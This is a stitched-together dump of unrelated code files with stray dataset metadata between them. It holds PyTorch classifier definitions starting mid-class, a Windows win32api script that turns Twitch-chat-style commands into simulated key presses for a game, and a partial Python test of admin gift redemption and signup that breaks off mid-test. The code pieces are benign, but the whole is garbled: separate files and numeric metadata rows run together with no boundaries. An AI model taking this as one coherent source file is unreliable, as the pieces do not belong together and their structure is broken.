super(DenseNet201, self).__init__()
base_net = models.densenet201(pretrained=False)
self.features = base_net.features
self.dense201_relu = nn.ReLU(inplace=True)
self.dense201_pool = nn.AdaptiveAvgPool2d((1, 1))
self.classifier = nn.Sequential(nn.Linear(1920, 512),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(512, 1))
del base_net
def forward(self, X):
X = X.view(-1, 3, 96, 96).float()
X = self.features(X)
X = self.dense201_relu(X)
X = self.dense201_pool(X)
X = torch.flatten(X, 1)
X = self.classifier(X)
return X
class DenseNet201Pretrained(nn.Module):
def __init__(self):
super(DenseNet201Pretrained, self).__init__()
base_net = models.densenet201(pretrained=True)
self.features = base_net.features
self.dense201_relu = nn.ReLU(inplace=True)
self.dense201_pool = nn.AdaptiveAvgPool2d((1, 1))
# we only want to train the last layers
for param in list(self.features.parameters()):
param.requires_grad = False # as default is True for all
for param in list(self.features.denseblock4.denselayer29.parameters()):
param.requires_grad = True
for param in list(self.features.denseblock4.denselayer30.parameters()):
param.requires_grad = True
for param in list(self.features.denseblock4.denselayer31.parameters()):
param.requires_grad = True
for param in list(self.features.denseblock4.denselayer32.parameters()):
param.requires_grad = True
self.classifier = nn.Sequential(nn.Linear(1920, 512),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(512, 1))
del base_net
def forward(self, X):
X = X.view(-1, 3, 224, 224).float()
X = self.features(X)
X = self.dense201_relu(X)
X = self.dense201_pool(X)
X = torch.flatten(X, 1)
X = self.classifier(X)
return X
class ResNet18_96(nn.Module):
def __init__(self):
super(ResNet18_96, self).__init__()
self.model = models.resnet18(pretrained=False)
# change last layer (fc) to adjust for binary classification
n_features_in = self.model.fc.in_features
self.model.fc = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(n_features_in, 1)
)
def forward(self, X):
X = X.view(-1, 3, 96, 96).float()
X = self.model(X)
return X
class ResNet152_96(nn.Module):
def __init__(self, pretrained=False):
super(ResNet152_96, self).__init__()
self.model = models.resnet152(pretrained=pretrained)
print("pretrained=", pretrained)
if pretrained:
# we only want to train the last 2 multilayers (i.e., layer 3 and 4)
for param in list(self.model.parameters()):
param.requires_grad = False # as default is True for all
for param in list(self.model.layer3.parameters()):
param.requires_grad = True
for param in list(self.model.layer4.parameters()):
param.requires_grad = True
# change last layer (fc) to adjust for binary classification
n_features_in = self.model.fc.in_features
self.model.fc = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(n_features_in, 1)
)
def forward(self, X):
X = X.view(-1, 3, 96, 96).float()
X = self.model(X)
return X
class ResNet34Pretrained(nn.Module):
def __init__(self):
super(ResNet34Pretrained, self).__init__()
self.model = models.resnet34(pretrained=True)
# we only want to train the last 2 multilayers (i.e., layer 3 and 4)
for param in list(self.model.parameters()):
param.requires_grad = False # as default is True for all
for param in list(self.model.layer3.parameters()):
param.requires_grad = True
for param in list(self.model.layer4.parameters()):
param.requires_grad = True
# change last layer (fc) to adjust for binary classification
n_features_in = self.model.fc.in_features
self.model.fc = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(n_features_in, 1)
)
def forward(self, X):
X = X.view(-1, 3, 224, 224).float()
X = self.model(X)
return X
class ResNet152Pretrained(nn.Module):
def __init__(self):
super(ResNet152Pretrained, self).__init__()
self.model = models.resnet152(pretrained=True)
# we only want to train the last 2 multilayers (i.e., layer 3 and 4)
for param in list(self.model.parameters()):
param.requires_grad = False # as default is True for all
for param in list(self.model.layer3.parameters()):
param.requires_grad = True
for param in list(self.model.layer4.parameters()):
param.requires_grad = True
# change last layer (fc) to adjust for binary classification
n_features_in = self.model.fc.in_features
self.model.fc = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(n_features_in, 1)
)
def forward(self, X):
X = X.view(-1, 3, 224, 224).float()
X = self.model(X)
return X
class VGG11(nn.Module):
def __init__(self):
super(VGG11, self).__init__()
base_net = models.vgg11(pretrained=False)
self.features = base_net.features
self.avgpool = base_net.avgpool
self.classifier = nn.Sequential(
nn.Linear(in_features=25088, out_features=4096, bias=True),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5, inplace=False),
nn.Linear(in_features=4096, out_features=4096, bias=True),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5, inplace=False),
nn.Linear(in_features=4096, out_features=1, bias=True)
)
del base_net
def forward(self, X):
X = X.view(-1, 3, 96, 96).float()
X = self.features(X)
X = self.avgpool(X)
X = torch.flatten(X, 1)
X = self.classifier(X)
return X
class VGG19(nn.Module):
def __init__(self):
super(VGG19, self).__init__()
base_net = models.vgg19(pretrained=False)
self.features = base_net.features
self.avgpool = base_net.avgpool
self.classifier = nn.Sequential(
nn.Linear(in_features=25088, out_features=4096, bias=True),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5, inplace=False),
nn.Linear(in_features=4096, out_features=4096, bias=True),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5, inplace=False),
nn.Linear(in_features=4096, out_features=1, bias=True)
)
del base_net
def forward(self, X):
X = X.view(-1, 3, 96, 96).float()
X = self.features(X)
X = self.avgpool(X)
X = torch.flatten(X, 1)
X = self.classifier(X)
return X
| 29.853659
| 116
| 0.575345
| 1,411
| 11,016
| 4.35365
| 0.100638
| 0.014
| 0.03093
| 0.043301
| 0.838515
| 0.819795
| 0.762006
| 0.729123
| 0.708937
| 0.708937
| 0
| 0.057222
| 0.31309
| 11,016
| 368
| 117
| 29.934783
| 0.754592
| 0.071169
| 0
| 0.713115
| 0
| 0
| 0.00109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090164
| false
| 0
| 0.012295
| 0
| 0.192623
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30c7911e775648584828421609b2ac504a7492e3
| 41
|
py
|
Python
|
decorators/__init__.py
|
jlorieau/useful_python
|
324fc2f5e93fa4aefeb420dbe7303c242818ccba
|
[
"MIT"
] | null | null | null |
decorators/__init__.py
|
jlorieau/useful_python
|
324fc2f5e93fa4aefeb420dbe7303c242818ccba
|
[
"MIT"
] | null | null | null |
decorators/__init__.py
|
jlorieau/useful_python
|
324fc2f5e93fa4aefeb420dbe7303c242818ccba
|
[
"MIT"
] | null | null | null |
from .weakref_props import weakref_props
| 20.5
| 40
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
30dd6de53706cad98b28e14d85d90f506b5fc13c
| 16,490
|
py
|
Python
|
extra/game-mdungeon.py
|
dpteam/twitch-plays
|
82becef76d7a8254bfde959946640457f4342fb3
|
[
"MIT"
] | null | null | null |
extra/game-mdungeon.py
|
dpteam/twitch-plays
|
82becef76d7a8254bfde959946640457f4342fb3
|
[
"MIT"
] | null | null | null |
extra/game-mdungeon.py
|
dpteam/twitch-plays
|
82becef76d7a8254bfde959946640457f4342fb3
|
[
"MIT"
] | null | null | null |
import win32api
import win32con
import time
class Game:
keymap = {
# Comment out any button(s) that would be unused
'up': 0x30,
'down': 0x31,
'left': 0x32,
'right': 0x33,
'a': 0x34,
'b': 0x35,
'x': 0x36,
'y': 0x37,
'start': 0x38,
'select': 0x39,
'l': 0x41,
'r': 0x42,
'l+a': 0x00,
'l+r': 0x00,
'a+b': 0x00,
'b+up': 0x00,
'b+down': 0x00,
'b+left': 0x00,
'b+right': 0x00,
'r+up': 0x00,
'r+down': 0x00,
'r+left': 0x00,
'r+right': 0x00,
'y+up': 0x00,
'y+down': 0x00,
'y+left': 0x00,
'y+right': 0x00,
'u+left': 0x00,
'u+right': 0x00,
'd+left': 0x00,
'd+right': 0x00,
'up2': 0x00,
'up3': 0x00,
'up4': 0x00,
'up5': 0x00,
'up6': 0x00,
'up7': 0x00,
'up8': 0x00,
'up9': 0x00,
'down2': 0x00,
'down3': 0x00,
'down4': 0x00,
'down5': 0x00,
'down6': 0x00,
'down7': 0x00,
'down8': 0x00,
'down9': 0x00,
'left2': 0x00,
'left3': 0x00,
'left4': 0x00,
'left5': 0x00,
'left6': 0x00,
'left7': 0x00,
'left8': 0x00,
'left9': 0x00,
'right2': 0x00,
'right3': 0x00,
'right4': 0x00,
'right5': 0x00,
'right6': 0x00,
'right7': 0x00,
'right8': 0x00,
'right9': 0x00,
'a2': 0x00,
'a3': 0x00,
'a4': 0x00,
'a5': 0x00,
'a6': 0x00,
'a7': 0x00,
'a8': 0x00,
'a9': 0x00,
'b2': 0x00,
'b3': 0x00,
'b4': 0x00,
'b5': 0x00,
'b6': 0x00,
'b7': 0x00,
'b8': 0x00,
'b9': 0x00
}
def get_valid_buttons(self):
return [button for button in self.keymap.keys()]
def is_valid_button(self, button):
return button in self.keymap.keys()
def button_to_key(self, button):
return self.keymap[button]
def push_button(self, button):
# How much elifs does it take to disorient a programmer?
# Too many to count
loopCntr=0
if button == 'l+a':
win32api.keybd_event(0x41, 0, 0, 0)
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x41, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'l+r':
win32api.keybd_event(0x41, 0, 0, 0)
win32api.keybd_event(0x42, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x41, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x42, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'a+b':
win32api.keybd_event(0x34, 0, 0, 0)
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'b+up':
win32api.keybd_event(0x35, 0, 0, 0)
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(3)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'b+down':
win32api.keybd_event(0x35, 0, 0, 0)
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(3)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'b+left':
win32api.keybd_event(0x35, 0, 0, 0)
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(3)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'b+right':
win32api.keybd_event(0x35, 0, 0, 0)
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(3)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'r+up':
win32api.keybd_event(0x42, 0, 0, 0)
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x42, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'r+down':
win32api.keybd_event(0x42, 0, 0, 0)
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x42, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'r+left':
win32api.keybd_event(0x42, 0, 0, 0)
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x42, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'r+right':
win32api.keybd_event(0x42, 0, 0, 0)
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x42, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'y+up':
win32api.keybd_event(0x37, 0, 0, 0)
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x37, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'y+down':
win32api.keybd_event(0x37, 0, 0, 0)
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x37, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'y+left':
win32api.keybd_event(0x37, 0, 0, 0)
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x37, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'y+right':
win32api.keybd_event(0x37, 0, 0, 0)
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x37, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'u+left':
win32api.keybd_event(0x30, 0, 0, 0)
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'u+right':
win32api.keybd_event(0x30, 0, 0, 0)
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'd+left':
win32api.keybd_event(0x31, 0, 0, 0)
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'd+right':
win32api.keybd_event(0x31, 0, 0, 0)
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
elif button == 'up2':
while loopCntr < 2:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up3':
while loopCntr < 3:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up4':
while loopCntr < 4:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up5':
while loopCntr < 5:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up6':
while loopCntr < 6:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up7':
while loopCntr < 7:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up8':
while loopCntr < 8:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'up9':
while loopCntr < 9:
win32api.keybd_event(0x30, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x30, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down2':
while loopCntr < 2:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down3':
while loopCntr < 3:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down4':
while loopCntr < 4:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down5':
while loopCntr < 5:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down6':
while loopCntr < 6:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down7':
while loopCntr < 7:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down8':
while loopCntr < 8:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'down9':
while loopCntr < 9:
win32api.keybd_event(0x31, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x31, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left2':
while loopCntr < 2:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left3':
while loopCntr < 3:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left4':
while loopCntr < 4:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left5':
while loopCntr < 5:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left6':
while loopCntr < 6:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left7':
while loopCntr < 7:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left8':
while loopCntr < 8:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'left9':
while loopCntr < 9:
win32api.keybd_event(0x32, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x32, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right2':
while loopCntr < 2:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right3':
while loopCntr < 3:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right4':
while loopCntr < 4:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right5':
while loopCntr < 5:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right6':
while loopCntr < 6:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right7':
while loopCntr < 7:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right8':
while loopCntr < 8:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'right9':
while loopCntr < 9:
win32api.keybd_event(0x33, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x33, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a2':
while loopCntr < 2:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a3':
while loopCntr < 3:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a4':
while loopCntr < 4:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a5':
while loopCntr < 5:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a6':
while loopCntr < 6:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a7':
while loopCntr < 7:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a8':
while loopCntr < 8:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'a9':
while loopCntr < 9:
win32api.keybd_event(0x34, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x34, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b2':
while loopCntr < 2:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b3':
while loopCntr < 3:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b4':
while loopCntr < 4:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b5':
while loopCntr < 5:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b6':
while loopCntr < 6:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b7':
while loopCntr < 7:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b8':
while loopCntr < 8:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
elif button == 'b9':
while loopCntr < 9:
win32api.keybd_event(0x35, 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(0x35, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(.5)
loopCntr+=1
else:
win32api.keybd_event(self.button_to_key(button), 0, 0, 0)
time.sleep(.15)
win32api.keybd_event(self.button_to_key(button), 0, win32con.KEYEVENTF_KEYUP, 0)
| 29.499106
| 83
| 0.649363
| 2,460
| 16,490
| 4.242276
| 0.055285
| 0.21675
| 0.300115
| 0.19174
| 0.887792
| 0.885588
| 0.816405
| 0.811709
| 0.809218
| 0.790533
| 0
| 0.157807
| 0.197999
| 16,490
| 558
| 84
| 29.551971
| 0.631304
| 0.007216
| 0
| 0.702011
| 0
| 0
| 0.037148
| 0
| 0
| 0
| 0.061343
| 0
| 0
| 0
| null | null | 0
| 0.005484
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
30f9e09032e62f937d216a2289d92f6ff8e5c962
| 36,393
|
py
|
Python
|
tests/models/test_gifts.py
|
plastr/extrasolar-game
|
1aad5971556d498e3617afe75f27e2f4132d4668
|
[
"MIT",
"Unlicense"
] | null | null | null |
tests/models/test_gifts.py
|
plastr/extrasolar-game
|
1aad5971556d498e3617afe75f27e2f4132d4668
|
[
"MIT",
"Unlicense"
] | null | null | null |
tests/models/test_gifts.py
|
plastr/extrasolar-game
|
1aad5971556d498e3617afe75f27e2f4132d4668
|
[
"MIT",
"Unlicense"
] | null | null | null |
# Copyright (c) 2010-2011 Lazy 8 Studios, LLC.
# All rights reserved.
import re
from front.tests import base
from front.tests.base import PRODUCT_KEY_S1_GIFT, VOUCHER_KEY_S1_GIFT, PRODUCT_KEY_ALL_GIFT, VOUCHER_KEY_ALL_GIFT
from front.tests.base import PRODUCT_KEY_S1, PRODUCT_KEY_ALL, VOUCHER_KEY_ALL, VOUCHER_KEY_S1
from front.tests.base import INVITE_EMAIL, INVITE_FIRST_NAME, INVITE_LAST_NAME, INVITE_LAST_NAME_TRUNCATED
from front.tests.mock_stripe import ChargeAlwaysSuccess, FAKE_CHARGE_ID_1
from front import gift_types
from front.lib import db, urls
from front.models import chips
from front.backend import admin
class TestGifts(base.TestCase):
def setUp(self):
super(TestGifts, self).setUp()
self.create_user('testuser@example.com', 'pw')
# Should always be able to send gifts even if there are no invites left.
self.set_user_invites_left(0)
# Advance time a few seconds to flush any chips.
self.advance_now(seconds=5)
def test_admin_gift_redeem_new(self):
# Create an admin gift as the 'testuser@example.com' admin user.
with db.commit_or_rollback(self.get_ctx()) as ctx:
with db.conn(ctx) as ctx:
admin_user = self.get_logged_in_user(ctx=ctx)
self.make_user_admin(admin_user)
gift = admin.create_admin_gift_of_type(ctx, admin_user, gift_types.GFT_S1_PASS, "Testing Gift")
self.logout_user()
# Redeem that admin gift for a new user.
response = self.app.get(gift.url_gift_redeem())
response = response.click(href=gift.url_gift_redeem_new_user())
form = response.forms['form_signup']
form['signup_email'].value = INVITE_EMAIL
form['first_name'].value = INVITE_FIRST_NAME
form['last_name'].value = INVITE_LAST_NAME
form['signup_password'] = "pw"
response = form.submit()
# Should attempt to send to /
response = response.follow()
self.assertEqual(urls.root(), response.request.path)
# And then redirect to root.
response = response.follow()
self.assertEqual(urls.auth_signup_complete(), response.request.path)
self.assertTrue("No Available Rovers" in response)
# Now validate the new user (who should still be logged in).
validate_url = self.get_user_by_email(INVITE_EMAIL).url_validate()
response = self.app.get(urls.root())
response = self.app.get(validate_url)
self.assertTrue("Account Authenticated" in response)
response = self.app.get(urls.ops())
self.assertEqual(urls.ops(), response.request.path)
